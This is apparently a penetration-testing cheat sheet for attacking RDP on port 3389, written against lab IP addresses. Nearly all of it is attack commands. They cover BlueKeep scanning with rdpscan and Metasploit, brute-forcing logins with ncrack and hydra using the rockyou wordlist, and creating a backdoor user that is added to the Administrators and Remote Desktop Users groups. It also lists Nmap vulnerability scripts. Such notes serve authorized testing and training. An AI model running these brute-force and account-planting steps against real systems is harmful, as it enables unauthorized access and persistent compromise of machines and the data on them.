RDP 3389
1. RDP Login:
To login to a remote machine using RDP:
Using
rdesktop
(for older systems):rdesktop -u DISCO 10.11.1.13
Using
xfreerdp
(more modern, cross-platform):xfreerdp /u:admin /v:10.10.10.10 + clipboard
2. Add a User and Grant Privileges:
Create a User:
net user redcliff password123 /add
Add the User to Administrator Group:
net localgroup Administrators redcliff /add
Add the User to Remote Desktop Users Group:
net localgroup "Remote Desktop Users" redcliff /ADD
3. RDP Vulnerability Scanning (BlueKeep):
Clone
rdpscan
Repository and run a scan:sudo git clone https://github.com/robertdavidgraham/rdpscan.git ./rdpscan 10.10.10.10
Scan for BlueKeep Vulnerability Using Metasploit: First, perform an Nmap scan to identify live RDP targets:
nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst
Then use Metasploit to run the BlueKeep scanner:
msfconsole > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep > set RHOSTS file:<path to rdp.lst> > run
4. Brute-Forcing RDP:
Brute-force RDP with
ncrack
:ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1 sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
Brute-force RDP with
hydra
:hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13
5. Nmap RDP Enumeration Scripts:
RDP Service Enumeration:
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1
Check for MS12-020 Vulnerability:
nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11
6. Microsoft Terminal Services (MS-WBT-SERVER):
You can identify the MS Terminal Services (RDP) version and potential vulnerabilities using Nmap:
Scan for RDP Vulnerabilities (MS-WBT-SERVER):
nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11
Last updated